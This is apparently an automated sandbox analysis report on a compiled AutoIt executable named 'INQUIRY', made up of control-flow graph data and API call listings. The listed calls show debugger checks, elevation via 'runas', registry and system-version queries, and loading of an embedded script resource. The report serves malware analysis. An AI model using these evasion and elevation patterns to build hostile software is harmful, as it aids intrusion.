104572->104566 104572->104568 104576 a47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104572->104576 104577 a48111 104573->104577 104574->104552 104578 a48150 CloseHandle 104575->104578 104579 a480e1 104576->104579 104583 a38b28 __recalloc 58 API calls 104577->104583 104578->104577 104581 a4815e 104578->104581 104579->104566 104579->104568 104586 a48189 104580->104586 104582 a38b28 __recalloc 58 API calls 104581->104582 104584 a48163 104582->104584 104583->104558 104584->104577 104585 a48344 104585->104558 104588 a48517 CloseHandle 104585->104588 104586->104585 104587 a418c1 __lseeki64_nolock 60 API calls 104586->104587 104606 a4820a 104586->104606 104589 a481f3 104587->104589 104590 a47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104588->104590 104593 a38af4 __wsopen_nolock 58 API calls 104589->104593 104589->104606 104592 a4853e 104590->104592 104591 a40e5b 70 API calls __read_nolock 104591->104606 104594 a48546 GetLastError 104592->104594 104595 a48572 104592->104595 104593->104606 104596 a38b07 __dosmaperr 58 API calls 104594->104596 104595->104558 104597 a48552 104596->104597 104600 a3d43d __free_osfhnd 59 API calls 104597->104600 104598 a40add __close_nolock 61 API calls 104598->104606 104599 a4823c 104601 a497a2 __chsize_nolock 82 API calls 104599->104601 104599->104606 104600->104595 104601->104599 104602 a3d886 __write 78 API calls 104602->104606 104603 a483c1 104605 a40add __close_nolock 61 API calls 104603->104605 104604 a418c1 60 API calls __lseeki64_nolock 104604->104606 104607 a483c8 104605->104607 104606->104585 104606->104591 104606->104598 104606->104599 104606->104602 104606->104603 104606->104604 104608 a38b28 __recalloc 58 API calls 104607->104608 104608->104558 104609->104528 104610->104534 104611->104534 104613 a14b83 104612->104613 104614 a14c3f LoadLibraryA 104612->104614 104613->104416 104613->104417 104614->104613 104615 a14c50 GetProcAddress 104614->104615 104615->104613 104617 a30db6 Mailbox 59 API calls 
104616->104617 104618 a15240 104617->104618 104618->104422 104620 a14ea3 FindResourceExW 104619->104620 104624 a14ec0 104619->104624 104621 a4d933 LoadResource 104620->104621 104620->104624 104622 a4d948 SizeofResource 104621->104622 104621->104624 104623 a4d95c LockResource 104622->104623 104622->104624 104623->104624 104624->104423 104626 a14ef4 104625->104626 104627 a4d9ab 104625->104627 104631 a3584d 104626->104631 104629 a14f02 104629->104433 104630->104423 104634 a35859 __initptd 104631->104634 104632 a3586b 104644 a38b28 58 API calls __getptd_noexit 104632->104644 104633 a35891 104646 a36c11 104633->104646 104634->104632 104634->104633 104637 a35870 104645 a38db6 9 API calls __wctomb_s_l 104637->104645 104639 a35897 104652 a357be 83 API calls 5 library calls 104639->104652 104641 a358a6 104653 a358c8 LeaveCriticalSection LeaveCriticalSection _fseek 104641->104653 104643 a3587b __initptd 104643->104629 104644->104637 104645->104643 104647 a36c43 EnterCriticalSection 104646->104647 104648 a36c21 104646->104648 104650 a36c39 104647->104650 104648->104647 104649 a36c29 104648->104649 104651 a39c0b __lock 58 API calls 104649->104651 104650->104639 104651->104650 104652->104641 104653->104643 104657 a355fd 104654->104657 104656 a14f2e 104656->104442 104658 a35609 __initptd 104657->104658 104659 a3561f _memset 104658->104659 104660 a3564c 104658->104660 104662 a35644 __initptd 104658->104662 104684 a38b28 58 API calls __getptd_noexit 104659->104684 104661 a36c11 __lock_file 59 API calls 104660->104661 104663 a35652 104661->104663 104662->104656 104670 a3541d 104663->104670 104666 a35639 104685 a38db6 9 API calls __wctomb_s_l 104666->104685 104671 a35453 104670->104671 104674 a35438 _memset 104670->104674 104686 a35686 LeaveCriticalSection LeaveCriticalSection _fseek 104671->104686 104672 a35443 104782 a38b28 58 API calls __getptd_noexit 104672->104782 104674->104671 104674->104672 104676 a35493 104674->104676 104676->104671 104680 a355a4 _memset 104676->104680 
104687 a346e6 104676->104687 104694 a40e5b 104676->104694 104762 a40ba7 104676->104762 104784 a40cc8 58 API calls 4 library calls 104676->104784 104785 a38b28 58 API calls __getptd_noexit 104680->104785 104683 a35448 104783 a38db6 9 API calls __wctomb_s_l 104683->104783 104684->104666 104685->104662 104686->104662 104688 a346f0 104687->104688 104689 a34705 104687->104689 104786 a38b28 58 API calls __getptd_noexit 104688->104786 104689->104676 104691 a346f5 104787 a38db6 9 API calls __wctomb_s_l 104691->104787 104693 a34700 104693->104676 104695 a40e93 104694->104695 104696 a40e7c 104694->104696 104698 a415cb 104695->104698 104702 a40ecd 104695->104702 104797 a38af4 58 API calls __getptd_noexit 104696->104797 104813 a38af4 58 API calls __getptd_noexit 104698->104813 104699 a40e81 104798 a38b28 58 API calls __getptd_noexit 104699->104798 104704 a40ed5 104702->104704 104712 a40eec 104702->104712 104703 a415d0 104814 a38b28 58 API calls __getptd_noexit 104703->104814 104799 a38af4 58 API calls __getptd_noexit 104704->104799 104707 a40ee1 104815 a38db6 9 API calls __wctomb_s_l 104707->104815 104708 a40eda 104800 a38b28 58 API calls __getptd_noexit 104708->104800 104710 a40f01 104801 a38af4 58 API calls __getptd_noexit 104710->104801 104712->104710 104713 a40f1b 104712->104713 104715 a40f39 104712->104715 104743 a40e88 104712->104743 104713->104710 104718 a40f26 104713->104718 104802 a3881d 58 API calls 2 library calls 104715->104802 104788 a45c6b 104718->104788 104719 a40f49 104721 a40f51 104719->104721 104722 a40f6c 104719->104722 104720 a4103a 104724 a410b3 ReadFile 104720->104724 104729 a41050 GetConsoleMode 104720->104729 104803 a38b28 58 API calls __getptd_noexit 104721->104803 104805 a418c1 60 API calls 3 library calls 104722->104805 104727 a410d5 104724->104727 104728 a41593 GetLastError 104724->104728 104726 a40f56 104804 a38af4 58 API calls __getptd_noexit 104726->104804 104727->104728 104735 a410a5 104727->104735 104731 a41093 104728->104731 104732 a415a0 
104728->104732 104733 a41064 104729->104733 104734 a410b0 104729->104734 104744 a41099 104731->104744 104806 a38b07 58 API calls 3 library calls 104731->104806 104811 a38b28 58 API calls __getptd_noexit 104732->104811 104733->104734 104737 a4106a ReadConsoleW 104733->104737 104734->104724 104735->104744 104745 a4110a 104735->104745 104748 a41377 104735->104748 104737->104735 104739 a4108d GetLastError 104737->104739 104738 a415a5 104812 a38af4 58 API calls __getptd_noexit 104738->104812 104739->104731 104742 a32d55 _free 58 API calls 104742->104743 104743->104676 104744->104742 104744->104743 104747 a41176 ReadFile 104745->104747 104753 a411f7 104745->104753 104750 a41197 GetLastError 104747->104750 104760 a411a1 104747->104760 104748->104744 104749 a4147d ReadFile 104748->104749 104755 a414a0 GetLastError 104749->104755 104761 a414ae 104749->104761 104750->104760 104751 a412b4 104756 a41264 MultiByteToWideChar 104751->104756 104809 a418c1 60 API calls 3 library calls 104751->104809 104752 a412a4 104808 a38b28 58 API calls __getptd_noexit 104752->104808 104753->104744 104753->104751 104753->104752 104753->104756 104755->104761 104756->104739 104756->104744 104760->104745 104807 a418c1 60 API calls 3 library calls 104760->104807 104761->104748 104810 a418c1 60 API calls 3 library calls 104761->104810 104763 a40bb2 104762->104763 104767 a40bc7 104762->104767 104849 a38b28 58 API calls __getptd_noexit 104763->104849 104764 a40bc2 104764->104676 104766 a40bb7 104850 a38db6 9 API calls __wctomb_s_l 104766->104850 104767->104764 104769 a40bfc 104767->104769 104851 a45fe4 58 API calls __malloc_crt 104767->104851 104771 a346e6 __stbuf 58 API calls 104769->104771 104772 a40c10 104771->104772 104816 a40d47 104772->104816 104774 a40c17 104774->104764 104775 a346e6 __stbuf 58 API calls 104774->104775 104776 a40c3a 104775->104776 104776->104764 104777 a346e6 __stbuf 58 API calls 104776->104777 104778 a40c46 104777->104778 104778->104764 104779 a346e6 __stbuf 58 API calls 
104778->104779 104780 a40c53 104779->104780 104781 a346e6 __stbuf 58 API calls 104780->104781 104781->104764 104782->104683 104783->104671 104784->104676 104785->104683 104786->104691 104787->104693 104789 a45c76 104788->104789 104790 a45c83 104788->104790 104791 a38b28 __recalloc 58 API calls 104789->104791 104792 a45c8f 104790->104792 104793 a38b28 __recalloc 58 API calls 104790->104793 104794 a45c7b 104791->104794 104792->104720 104795 a45cb0 104793->104795 104794->104720 104796 a38db6 __wctomb_s_l 9 API calls 104795->104796 104796->104794 104797->104699 104798->104743 104799->104708 104800->104707 104801->104708 104802->104719 104803->104726 104804->104743 104805->104718 104806->104744 104807->104760 104808->104744 104809->104756 104810->104761 104811->104738 104812->104744 104813->104703 104814->104707 104815->104743 104817 a40d53 __initptd 104816->104817 104818 a40d77 104817->104818 104819 a40d60 104817->104819 104821 a40e3b 104818->104821 104824 a40d8b 104818->104824 104820 a38af4 __wsopen_nolock 58 API calls 104819->104820 104823 a40d65 104820->104823 104822 a38af4 __wsopen_nolock 58 API calls 104821->104822 104825 a40dae 104822->104825 104826 a38b28 __recalloc 58 API calls 104823->104826 104827 a40db6 104824->104827 104828 a40da9 104824->104828 104834 a38b28 __recalloc 58 API calls 104825->104834 104838 a40d6c __initptd 104826->104838 104830 a40dc3 104827->104830 104831 a40dd8 104827->104831 104829 a38af4 __wsopen_nolock 58 API calls 104828->104829 104829->104825 104832 a38af4 __wsopen_nolock 58 API calls 104830->104832 104833 a3d206 ___lock_fhandle 59 API calls 104831->104833 104835 a40dc8 104832->104835 104836 a40dde 104833->104836 104837 a40dd0 104834->104837 104839 a38b28 __recalloc 58 API calls 104835->104839 104840 a40e04 104836->104840 104841 a40df1 104836->104841 104843 a38db6 __wctomb_s_l 9 API calls 104837->104843 104838->104774 104839->104837 104844 a38b28 __recalloc 58 API calls 104840->104844 104842 a40e5b __read_nolock 70 API calls 
104841->104842 104846 a40dfd 104842->104846 104843->104838 104845 a40e09 104844->104845 104847 a38af4 __wsopen_nolock 58 API calls 104845->104847 104848 a40e33 __read LeaveCriticalSection 104846->104848 104847->104846 104848->104838 104849->104766 104850->104764 104851->104769 104855 a3520a GetSystemTimeAsFileTime 104852->104855 104854 a78f6e 104854->104444 104856 a35238 __aulldiv 104855->104856 104856->104854 104858 a35c6c __initptd 104857->104858 104859 a35c93 104858->104859 104860 a35c7e 104858->104860 104862 a36c11 __lock_file 59 API calls 104859->104862 104871 a38b28 58 API calls __getptd_noexit 104860->104871 104864 a35c99 104862->104864 104863 a35c83 104872 a38db6 9 API calls __wctomb_s_l 104863->104872 104873 a358d0 67 API calls 7 library calls 104864->104873 104867 a35ca4 104874 a35cc4 LeaveCriticalSection LeaveCriticalSection _fseek 104867->104874 104869 a35cb6 104870 a35c8e __initptd 104869->104870 104870->104448 104871->104863 104872->104870 104873->104867 104874->104869 104875->104314 104876->104327 104877->104329 104878->104326 104879->104335 104881 a19169 Mailbox 104880->104881 104882 a4f19f 104881->104882 104886 a19173 104881->104886 104883 a30db6 Mailbox 59 API calls 104882->104883 104885 a4f1ab 104883->104885 104884 a1917a 104884->104341 104886->104884 104888 a19c90 59 API calls Mailbox 104886->104888 104888->104886 104889->104350 104890->104345 104896 a79748 __tzset_nolock _wcscmp 104891->104896 104892 a795dc 104892->104356 104892->104384 104893 a14f0b 74 API calls 104893->104896 104894 a79109 GetSystemTimeAsFileTime 104894->104896 104895 a14ee5 85 API calls 104895->104896 104896->104892 104896->104893 104896->104894 104896->104895 104898 a78b11 104897->104898 104899 a78b1f 104897->104899 104900 a3525b 115 API calls 104898->104900 104901 a78b64 104899->104901 104902 a3525b 115 API calls 104899->104902 104927 a78b28 104899->104927 104900->104899 104928 a78d91 104901->104928 104904 a78b49 104902->104904 104904->104901 104906 a78b52 104904->104906 
104905 a78ba8 104907 a78bcd 104905->104907 104908 a78bac 104905->104908 104910 a353a6 __fcloseall 83 API calls 104906->104910 104906->104927 104932 a789a9 104907->104932 104909 a78bb9 104908->104909 104912 a353a6 __fcloseall 83 API calls 104908->104912 104914 a353a6 __fcloseall 83 API calls 104909->104914 104909->104927 104910->104927 104912->104909 104914->104927 104915 a78bfb 104941 a78c2b 104915->104941 104916 a78bdb 104917 a78be8 104916->104917 104919 a353a6 __fcloseall 83 API calls 104916->104919 104921 a353a6 __fcloseall 83 API calls 104917->104921 104917->104927 104919->104917 104921->104927 104924 a78c16 104926 a353a6 __fcloseall 83 API calls 104924->104926 104924->104927 104926->104927 104927->104385 104929 a78db6 104928->104929 104930 a78d9f __tzset_nolock _memmove 104928->104930 104931 a355e2 __fread_nolock 74 API calls 104929->104931 104930->104905 104931->104930 104933 a3571c __crtGetStringTypeA_stat 58 API calls 104932->104933 104934 a789b8 104933->104934 104935 a3571c __crtGetStringTypeA_stat 58 API calls 104934->104935 104936 a789cc 104935->104936 104937 a3571c __crtGetStringTypeA_stat 58 API calls 104936->104937 104938 a789e0 104937->104938 104939 a78d0d 58 API calls 104938->104939 104940 a789f3 104938->104940 104939->104940 104940->104915 104940->104916 104945 a78c40 104941->104945 104942 a78cf8 104974 a78f35 104942->104974 104943 a78a05 74 API calls 104943->104945 104945->104942 104945->104943 104948 a78c02 104945->104948 104970 a78e12 104945->104970 104978 a78aa1 74 API calls 104945->104978 104949 a78d0d 104948->104949 104950 a78d20 104949->104950 104951 a78d1a 104949->104951 104953 a78d31 104950->104953 104954 a32d55 _free 58 API calls 104950->104954 104952 a32d55 _free 58 API calls 104951->104952 104952->104950 104955 a78c09 104953->104955 104956 a32d55 _free 58 API calls 104953->104956 104954->104953 104955->104924 104957 a353a6 104955->104957 104956->104955 104958 a353b2 __initptd 104957->104958 104959 a353c6 104958->104959 104960 a353de 
104958->104960 105027 a38b28 58 API calls __getptd_noexit 104959->105027 104962 a36c11 __lock_file 59 API calls 104960->104962 104967 a353d6 __initptd 104960->104967 104964 a353f0 104962->104964 104963 a353cb 105028 a38db6 9 API calls __wctomb_s_l 104963->105028 105011 a3533a 104964->105011 104967->104924 104971 a78e21 104970->104971 104973 a78e61 104970->104973 104971->104945 104971->104971 104973->104971 104979 a78ee8 104973->104979 104975 a78f42 104974->104975 104976 a78f53 104974->104976 104977 a34863 80 API calls 104975->104977 104976->104948 104977->104976 104978->104945 104980 a78f14 104979->104980 104982 a78f25 104979->104982 104983 a34863 104980->104983 104982->104973 104984 a3486f __initptd 104983->104984 104985 a3489d __initptd 104984->104985 104986 a348a5 104984->104986 104987 a3488d 104984->104987 104985->104982 104988 a36c11 __lock_file 59 API calls 104986->104988 105008 a38b28 58 API calls __getptd_noexit 104987->105008 104990 a348ab 104988->104990 104996 a3470a 104990->104996 104991 a34892 105009 a38db6 9 API calls __wctomb_s_l 104991->105009 104998 a34719 104996->104998 105005 a34737 104996->105005 104997 a34727 104999 a38b28 __recalloc 58 API calls 104997->104999 104998->104997 105000 a34751 _memmove 104998->105000 104998->105005 105001 a3472c 104999->105001 105003 a3ae1e __flsbuf 78 API calls 105000->105003 105004 a34a3d __flush 78 API calls 105000->105004 105000->105005 105006 a346e6 __stbuf 58 API calls 105000->105006 105007 a3d886 __write 78 API calls 105000->105007 105002 a38db6 __wctomb_s_l 9 API calls 105001->105002 105002->105005 105003->105000 105004->105000 105010 a348dd LeaveCriticalSection LeaveCriticalSection _fseek 105005->105010 105006->105000 105007->105000 105008->104991 105009->104985 105010->104985 105012 a35349 105011->105012 105013 a3535d 105011->105013 105066 a38b28 58 API calls __getptd_noexit 105012->105066 105015 a35359 105013->105015 105030 a34a3d 105013->105030 105029 a35415 LeaveCriticalSection LeaveCriticalSection 
[Control-flow graph export: flattened node/edge list of basic-block addresses and resolved library calls (CRT file and console I/O such as WriteFile, GetConsoleMode and WideCharToMultiByte; CreateFileW/ReadFile/SetFilePointerEx file access; registry access via RegOpenKeyExW, RegQueryValueExW and RegCloseKey; environment checks via GetVersionExW, IsWow64Process, GetSystemInfo and GetNativeSystemInfo; LoadLibraryA/GetProcAddress; GetPEB and Sleep; OleInitialize and CreateThread). The rendered graph is not recoverable from the text.]

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A13B68
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00A13B7A
                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00AD52F8,00AD52E0,?,?), ref: 00A13BEB
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                                • Part of subcall function 00A2092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A13C14,00AD52F8,?,?,?), ref: 00A2096E
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A13C6F
                                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00AC7770,00000010), ref: 00A4D281
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00AD52F8,?,?,?), ref: 00A4D2B9
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AC4260,00AD52F8,?,?,?), ref: 00A4D33F
                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00A4D346
                                                                                                • Part of subcall function 00A13A46: GetSysColorBrush.USER32(0000000F), ref: 00A13A50
                                                                                                • Part of subcall function 00A13A46: LoadCursorW.USER32(00000000,00007F00), ref: 00A13A5F
                                                                                                • Part of subcall function 00A13A46: LoadIconW.USER32(00000063), ref: 00A13A76
                                                                                                • Part of subcall function 00A13A46: LoadIconW.USER32(000000A4), ref: 00A13A88
                                                                                                • Part of subcall function 00A13A46: LoadIconW.USER32(000000A2), ref: 00A13A9A
                                                                                                • Part of subcall function 00A13A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A13AC0
                                                                                                • Part of subcall function 00A13A46: RegisterClassExW.USER32(?), ref: 00A13B16
                                                                                                • Part of subcall function 00A139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A13A03
                                                                                                • Part of subcall function 00A139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13A24
                                                                                                • Part of subcall function 00A139D5: ShowWindow.USER32(00000000,?,?), ref: 00A13A38
                                                                                                • Part of subcall function 00A139D5: ShowWindow.USER32(00000000,?,?), ref: 00A13A41
                                                                                                • Part of subcall function 00A1434A: _memset.LIBCMT ref: 00A14370
                                                                                                • Part of subcall function 00A1434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A14415
                                                                                              Strings
                                                                                              • This is a third-party compiled AutoIt script., xrefs: 00A4D279
                                                                                              • runas, xrefs: 00A4D33A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                              • API String ID: 529118366-3287110873
                                                                                              • Opcode ID: 0c3efd86e98283803901dc97e8fbaf62ea9e51ef9b8ca55c584ab92a86c4237d
                                                                                              • Instruction ID: 51a551b4a92152292382f5817afda284d83b5ee0b56520b428fc196b3d0d86a4
                                                                                              • Opcode Fuzzy Hash: 0c3efd86e98283803901dc97e8fbaf62ea9e51ef9b8ca55c584ab92a86c4237d
                                                                                              • Instruction Fuzzy Hash: 1E51D475E09248BECF01EFF5DD05EED7B78AF45710B004066F452A62A2DAB0568ACB61

                                                                                              Control-flow Graph

                                                                                              [Control-flow graph node data not reproduced; the graph covers basic blocks a149a0-a14b35 and a4d767-a4d894, whose API calls are listed below.]
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00A149CD
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              • GetCurrentProcess.KERNEL32(?,00A9FAEC,00000000,00000000,?), ref: 00A14A9A
                                                                                              • IsWow64Process.KERNEL32(00000000), ref: 00A14AA1
                                                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00A14AE7
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A14AF2
                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00A14B23
                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00A14B2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1986165174-0
                                                                                              • Opcode ID: 4d62f58253c465ac2219929506ccb920288777e7826baf621be1c8169a458a4d
                                                                                              • Instruction ID: 3f6f7d9cf56a0e1699faa37c8ce2e4606b5c8fb6e352e867695022349884a2f6
                                                                                              • Opcode Fuzzy Hash: 4d62f58253c465ac2219929506ccb920288777e7826baf621be1c8169a458a4d
                                                                                              • Instruction Fuzzy Hash: BF91C43598D7C0DEC731CB7895501EAFFF5AF6E300B584AAED0C793A41D620A588C769

                                                                                              Control-flow Graph

                                                                                              [Control-flow graph node data not reproduced; the graph covers basic blocks a14e89-a14ec6 and a4d933-a4d98b, whose API calls are listed below.]
                                                                                              APIs
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00A14D8E,?,?,00000000,00000000), ref: 00A14E99
                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A14D8E,?,?,00000000,00000000), ref: 00A14EB0
                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,00A14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00A14E2F), ref: 00A4D937
                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00A14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00A14E2F), ref: 00A4D94C
                                                                                              • LockResource.KERNEL32(00A14D8E,?,?,00A14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00A14E2F,00000000), ref: 00A4D95F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                              • String ID: SCRIPT
                                                                                              • API String ID: 3051347437-3967369404
                                                                                              • Opcode ID: b715b803d2d400e4ded562d4db2bdee9fc0ae1561ec464c7e90895be14be4d40
                                                                                              • Instruction ID: 9333d1ceeb48f898c2fd3e3068b38d0f42db688f7e805e7cdf4821663e627900
                                                                                              • Opcode Fuzzy Hash: b715b803d2d400e4ded562d4db2bdee9fc0ae1561ec464c7e90895be14be4d40
                                                                                              • Instruction Fuzzy Hash: DB115EB5244700BFD7218BA9EC48FA77BBAFBC9B51F204269F405C6290DF71E8418660
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00A4E398), ref: 00A7446A
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00A7447B
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A7448B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                              • String ID:
                                                                                              • API String ID: 48322524-0
                                                                                              • Opcode ID: cbd2ce922369e373c2a519c4625a713e882a48a9eed84b14a434c482b5c9af78
                                                                                              • Instruction ID: 35026a8a778d16235821ef793b999c29f421688dd8f7a1101b7e9d6326ec3221
                                                                                              • Opcode Fuzzy Hash: cbd2ce922369e373c2a519c4625a713e882a48a9eed84b14a434c482b5c9af78
                                                                                              • Instruction Fuzzy Hash: 93E0D8335105006B4210AB78EC0D5EA775C9E09335F24C716F839C10D0FB745900A595
                                                                                              Strings
                                                                                              • Variable must be of type 'Object'., xrefs: 00A53E62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Variable must be of type 'Object'.
                                                                                              • API String ID: 0-109567571
                                                                                              • Opcode ID: e841162f23608dffb8712ccbe9c34e236fa415d363f40cac3ed6b7c6fe7b0d8f
                                                                                              • Instruction ID: a482492509630f4f2d504ffa3060a7f763638de5f9e0a05a17511e00e037f299
                                                                                              • Opcode Fuzzy Hash: e841162f23608dffb8712ccbe9c34e236fa415d363f40cac3ed6b7c6fe7b0d8f
                                                                                              • Instruction Fuzzy Hash: A7A28C75A00215DFCB24CF98C580AEAB7B2FF58314F288469ED06AB351D735ED86CB90
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A20A5B
                                                                                              • timeGetTime.WINMM ref: 00A20D16
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A20E53
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00A20E61
                                                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00A20EFA
                                                                                              • DestroyWindow.USER32 ref: 00A20F06
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A20F20
                                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00A54E83
                                                                                              • TranslateMessage.USER32(?), ref: 00A55C60
                                                                                              • DispatchMessageW.USER32(?), ref: 00A55C6E
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A55C82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
